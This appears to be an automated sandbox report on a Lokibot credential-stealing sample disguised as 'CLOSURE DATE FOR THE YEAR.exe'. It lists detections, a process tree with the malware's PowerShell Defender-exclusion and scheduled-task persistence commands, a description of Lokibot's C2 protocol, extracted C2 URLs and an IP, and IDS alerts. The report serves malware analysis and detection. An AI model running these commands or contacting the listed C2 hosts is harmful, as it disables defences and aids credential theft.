Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CLOSURE DATE FOR THE YEAR.exe

Overview

General Information

Sample name:CLOSURE DATE FOR THE YEAR.exe
Analysis ID:1568026
MD5:17bf29a93776b4f6be948802f652e6a9
SHA1:3e4727a68d9a4ee3dc3af79408d60916777c1546
SHA256:527a3bc0b6281d3e65cb6b19801b1a9d748d5ac773fcb4655edc783534450816
Tags:exeLokiuser-abuse_ch
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Lokibot
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • CLOSURE DATE FOR THE YEAR.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe" MD5: 17BF29A93776B4F6BE948802F652E6A9)
    • powershell.exe (PID: 7732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7792 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8092 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7852 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpB774.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7996 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • IOsbBBIDAm.exe (PID: 8056 cmdline: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe MD5: 17BF29A93776B4F6BE948802F652E6A9)
    • schtasks.exe (PID: 7268 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpDA2F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 2132 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8056 -s 1768 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/kings/five/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
      00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
          • 0x17450:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
          00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x481b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          Click to see the 45 entries
          SourceRuleDescriptionAuthorStrings
          9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
            9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
                • 0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
                • 0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
                Click to see the 37 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe", ParentImage: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe, ParentProcessId: 7480, ParentProcessName: CLOSURE DATE FOR THE YEAR.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe", ProcessId: 7732, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe", ParentImage: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe, ParentProcessId: 7480, ParentProcessName: CLOSURE DATE FOR THE YEAR.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe", ProcessId: 7732, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpDA2F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpDA2F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe, ParentImage: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe, ParentProcessId: 8056, ParentProcessName: IOsbBBIDAm.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpDA2F.tmp", ProcessId: 7268, ProcessName: schtasks.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpB774.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpB774.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe", ParentImage: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe, ParentProcessId: 7480, ParentProcessName: CLOSURE DATE FOR THE YEAR.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpB774.tmp", ProcessId: 7852, ProcessName: schtasks.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe", ParentImage: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe, ParentProcessId: 7480, ParentProcessName: CLOSURE DATE FOR THE YEAR.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe", ProcessId: 7732, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpB774.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpB774.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe", ParentImage: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe, ParentProcessId: 7480, ParentProcessName: CLOSURE DATE FOR THE YEAR.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpB774.tmp", ProcessId: 7852, ProcessName: schtasks.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-04T06:52:08.289516+010020243121A Network Trojan was detected192.168.2.44973794.156.177.4180TCP
                2024-12-04T06:52:10.175294+010020243121A Network Trojan was detected192.168.2.44973894.156.177.4180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-04T06:52:06.767642+010020253811Malware Command and Control Activity Detected192.168.2.44973794.156.177.4180TCP
                2024-12-04T06:52:08.695716+010020253811Malware Command and Control Activity Detected192.168.2.44973894.156.177.4180TCP
                2024-12-04T06:52:10.478754+010020253811Malware Command and Control Activity Detected192.168.2.44973994.156.177.4180TCP
                2024-12-04T06:52:12.295749+010020253811Malware Command and Control Activity Detected192.168.2.44974094.156.177.4180TCP
                2024-12-04T06:52:14.164338+010020253811Malware Command and Control Activity Detected192.168.2.44974194.156.177.4180TCP
                2024-12-04T06:52:15.938259+010020253811Malware Command and Control Activity Detected192.168.2.44974394.156.177.4180TCP
                2024-12-04T06:52:17.657827+010020253811Malware Command and Control Activity Detected192.168.2.44974694.156.177.4180TCP
                2024-12-04T06:52:19.405358+010020253811Malware Command and Control Activity Detected192.168.2.44975094.156.177.4180TCP
                2024-12-04T06:52:21.262165+010020253811Malware Command and Control Activity Detected192.168.2.44975294.156.177.4180TCP
                2024-12-04T06:52:23.073188+010020253811Malware Command and Control Activity Detected192.168.2.44975494.156.177.4180TCP
                2024-12-04T06:52:24.932098+010020253811Malware Command and Control Activity Detected192.168.2.44975694.156.177.4180TCP
                2024-12-04T06:52:26.793786+010020253811Malware Command and Control Activity Detected192.168.2.44975794.156.177.4180TCP
                2024-12-04T06:52:28.638241+010020253811Malware Command and Control Activity Detected192.168.2.44975994.156.177.4180TCP
                2024-12-04T06:52:30.565483+010020253811Malware Command and Control Activity Detected192.168.2.44976194.156.177.4180TCP
                2024-12-04T06:52:32.892280+010020253811Malware Command and Control Activity Detected192.168.2.44976294.156.177.4180TCP
                2024-12-04T06:52:34.734954+010020253811Malware Command and Control Activity Detected192.168.2.44976494.156.177.4180TCP
                2024-12-04T06:52:36.409350+010020253811Malware Command and Control Activity Detected192.168.2.44976694.156.177.4180TCP
                2024-12-04T06:52:38.347814+010020253811Malware Command and Control Activity Detected192.168.2.44976794.156.177.4180TCP
                2024-12-04T06:52:40.197879+010020253811Malware Command and Control Activity Detected192.168.2.44976894.156.177.4180TCP
                2024-12-04T06:52:42.088177+010020253811Malware Command and Control Activity Detected192.168.2.44976994.156.177.4180TCP
                2024-12-04T06:52:44.074154+010020253811Malware Command and Control Activity Detected192.168.2.44977094.156.177.4180TCP
                2024-12-04T06:52:45.927567+010020253811Malware Command and Control Activity Detected192.168.2.44977194.156.177.4180TCP
                2024-12-04T06:52:47.828393+010020253811Malware Command and Control Activity Detected192.168.2.44977294.156.177.4180TCP
                2024-12-04T06:52:49.779959+010020253811Malware Command and Control Activity Detected192.168.2.44977394.156.177.4180TCP
                2024-12-04T06:52:51.635755+010020253811Malware Command and Control Activity Detected192.168.2.44977494.156.177.4180TCP
                2024-12-04T06:52:53.344478+010020253811Malware Command and Control Activity Detected192.168.2.44977594.156.177.4180TCP
                2024-12-04T06:52:55.009703+010020253811Malware Command and Control Activity Detected192.168.2.44977694.156.177.4180TCP
                2024-12-04T06:52:56.900865+010020253811Malware Command and Control Activity Detected192.168.2.44977894.156.177.4180TCP
                2024-12-04T06:52:58.761872+010020253811Malware Command and Control Activity Detected192.168.2.44978094.156.177.4180TCP
                2024-12-04T06:53:00.620039+010020253811Malware Command and Control Activity Detected192.168.2.44978694.156.177.4180TCP
                2024-12-04T06:53:02.477302+010020253811Malware Command and Control Activity Detected192.168.2.44979294.156.177.4180TCP
                2024-12-04T06:53:04.401220+010020253811Malware Command and Control Activity Detected192.168.2.44979394.156.177.4180TCP
                2024-12-04T06:53:06.095984+010020253811Malware Command and Control Activity Detected192.168.2.44979994.156.177.4180TCP
                2024-12-04T06:53:07.851506+010020253811Malware Command and Control Activity Detected192.168.2.44980594.156.177.4180TCP
                2024-12-04T06:53:09.713035+010020253811Malware Command and Control Activity Detected192.168.2.44981194.156.177.4180TCP
                2024-12-04T06:53:11.637327+010020253811Malware Command and Control Activity Detected192.168.2.44981694.156.177.4180TCP
                2024-12-04T06:53:13.370849+010020253811Malware Command and Control Activity Detected192.168.2.44981894.156.177.4180TCP
                2024-12-04T06:53:15.244855+010020253811Malware Command and Control Activity Detected192.168.2.44982494.156.177.4180TCP
                2024-12-04T06:53:17.057306+010020253811Malware Command and Control Activity Detected192.168.2.44982994.156.177.4180TCP
                2024-12-04T06:53:18.965518+010020253811Malware Command and Control Activity Detected192.168.2.44983494.156.177.4180TCP
                2024-12-04T06:53:20.841367+010020253811Malware Command and Control Activity Detected192.168.2.44984194.156.177.4180TCP
                2024-12-04T06:53:22.493732+010020253811Malware Command and Control Activity Detected192.168.2.44984594.156.177.4180TCP
                2024-12-04T06:53:24.369185+010020253811Malware Command and Control Activity Detected192.168.2.44985094.156.177.4180TCP
                2024-12-04T06:53:26.229898+010020253811Malware Command and Control Activity Detected192.168.2.44985594.156.177.4180TCP
                2024-12-04T06:53:28.109936+010020253811Malware Command and Control Activity Detected192.168.2.44986194.156.177.4180TCP
                2024-12-04T06:53:29.804559+010020253811Malware Command and Control Activity Detected192.168.2.44986694.156.177.4180TCP
                2024-12-04T06:53:31.659622+010020253811Malware Command and Control Activity Detected192.168.2.44987194.156.177.4180TCP
                2024-12-04T06:53:33.543135+010020253811Malware Command and Control Activity Detected192.168.2.44987594.156.177.4180TCP
                2024-12-04T06:53:35.720159+010020253811Malware Command and Control Activity Detected192.168.2.44988194.156.177.4180TCP
                2024-12-04T06:53:37.417338+010020253811Malware Command and Control Activity Detected192.168.2.44988694.156.177.4180TCP
                2024-12-04T06:53:39.230433+010020253811Malware Command and Control Activity Detected192.168.2.44989194.156.177.4180TCP
                2024-12-04T06:53:41.090316+010020253811Malware Command and Control Activity Detected192.168.2.44989694.156.177.4180TCP
                2024-12-04T06:53:42.933722+010020253811Malware Command and Control Activity Detected192.168.2.44990294.156.177.4180TCP
                2024-12-04T06:53:44.792352+010020253811Malware Command and Control Activity Detected192.168.2.44990694.156.177.4180TCP
                2024-12-04T06:53:46.706490+010020253811Malware Command and Control Activity Detected192.168.2.44991294.156.177.4180TCP
                2024-12-04T06:53:48.570673+010020253811Malware Command and Control Activity Detected192.168.2.44991694.156.177.4180TCP
                2024-12-04T06:53:50.433426+010020253811Malware Command and Control Activity Detected192.168.2.44992094.156.177.4180TCP
                2024-12-04T06:53:52.290981+010020253811Malware Command and Control Activity Detected192.168.2.44992594.156.177.4180TCP
                2024-12-04T06:53:54.163772+010020253811Malware Command and Control Activity Detected192.168.2.44993094.156.177.4180TCP
                2024-12-04T06:53:55.922617+010020253811Malware Command and Control Activity Detected192.168.2.44993694.156.177.4180TCP
                2024-12-04T06:53:57.777455+010020253811Malware Command and Control Activity Detected192.168.2.44994194.156.177.4180TCP
                2024-12-04T06:53:59.620459+010020253811Malware Command and Control Activity Detected192.168.2.44994694.156.177.4180TCP
                2024-12-04T06:54:01.491745+010020253811Malware Command and Control Activity Detected192.168.2.44995094.156.177.4180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-04T06:52:12.021642+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449739TCP
                2024-12-04T06:52:13.893779+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449740TCP
                2024-12-04T06:52:15.652893+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449741TCP
                2024-12-04T06:52:17.338561+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449743TCP
                2024-12-04T06:52:19.145796+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449746TCP
                2024-12-04T06:52:21.002459+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449750TCP
                2024-12-04T06:52:22.805215+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449752TCP
                2024-12-04T06:52:24.671843+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449754TCP
                2024-12-04T06:52:26.523527+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449756TCP
                2024-12-04T06:52:28.378825+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449757TCP
                2024-12-04T06:52:30.298016+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449759TCP
                2024-12-04T06:52:32.214744+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449761TCP
                2024-12-04T06:52:34.460893+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449762TCP
                2024-12-04T06:52:36.138567+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449764TCP
                2024-12-04T06:52:38.013205+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449766TCP
                2024-12-04T06:52:39.937959+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449767TCP
                2024-12-04T06:52:41.827201+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449768TCP
                2024-12-04T06:52:43.730471+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449769TCP
                2024-12-04T06:52:45.655216+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449770TCP
                2024-12-04T06:52:47.555548+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449771TCP
                2024-12-04T06:52:49.469198+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449772TCP
                2024-12-04T06:52:51.371174+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449773TCP
                2024-12-04T06:52:53.071414+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449774TCP
                2024-12-04T06:52:54.743376+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449775TCP
                2024-12-04T06:52:56.644483+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449776TCP
                2024-12-04T06:52:58.498303+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449778TCP
                2024-12-04T06:53:00.351213+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449780TCP
                2024-12-04T06:53:02.213689+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449786TCP
                2024-12-04T06:53:04.129571+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449792TCP
                2024-12-04T06:53:05.822697+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449793TCP
                2024-12-04T06:53:07.596717+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449799TCP
                2024-12-04T06:53:09.450203+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449805TCP
                2024-12-04T06:53:11.284231+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449811TCP
                2024-12-04T06:53:13.101166+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449816TCP
                2024-12-04T06:53:14.988014+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449818TCP
                2024-12-04T06:53:16.798129+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449824TCP
                2024-12-04T06:53:18.706548+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449829TCP
                2024-12-04T06:53:20.574452+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449834TCP
                2024-12-04T06:53:22.239334+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449841TCP
                2024-12-04T06:53:24.111122+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449845TCP
                2024-12-04T06:53:25.967804+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449850TCP
                2024-12-04T06:53:27.836168+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449855TCP
                2024-12-04T06:53:29.529651+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449861TCP
                2024-12-04T06:53:31.393432+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449866TCP
                2024-12-04T06:53:33.282610+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449871TCP
                2024-12-04T06:53:35.213127+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449875TCP
                2024-12-04T06:53:37.150752+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449881TCP
                2024-12-04T06:53:38.966714+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449886TCP
                2024-12-04T06:53:40.833744+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449891TCP
